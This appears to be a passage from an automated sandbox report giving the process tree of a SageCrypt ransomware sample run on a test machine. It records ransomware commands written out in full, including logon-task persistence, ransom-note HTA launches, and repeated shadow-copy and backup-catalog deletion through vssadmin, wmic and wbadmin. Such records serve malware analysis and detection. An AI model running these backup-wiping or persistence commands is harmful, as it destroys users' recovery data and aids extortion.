                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_sTlLoTpq.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe
  "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe" g
  3⤵
  • Executes dropped EXE
  PID:3768
• C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /CREATE /TN "FsJjs3Fo" /TR "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe" /SC ONLOGON /RL HIGHEST /F
  3⤵
  • Scheduled Task/Job: Scheduled Task
  PID:1656
• C:\Windows\syswow64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  3⤵
  • Enumerates connected drives
  • Sets desktop wallpaper using registry
  • Modifies data under HKEY_USERS
  • Modifies registry class
  • Suspicious behavior: MapViewOfSection
  PID:3388
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:5704
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
      4⤵
        PID:4856
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin.exe delete shadows /all /quiet
          5⤵
          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
  4⤵
  • Suspicious use of SetWindowsHookEx
  PID:6268
• C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
  4⤵
  • Modifies Internet Explorer settings
  PID:5312
• C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
  4⤵
    PID:6500
  • C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "FsJjs3Fo"
    4⤵
      PID:3660
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f31199139.vbs"
      4⤵
        PID:4460
      • C:\Windows\SysWOW64\shell.exe
        "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet
        4⤵
          PID:4856
        • C:\Windows\SysWOW64\shell.exe
          "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
          4⤵
            PID:5200
          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7388
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
      PID:5100
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:7456
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:7460
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:2140
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:6820
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:7220
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:7488
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:4696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\syswow64\explorer.exe"
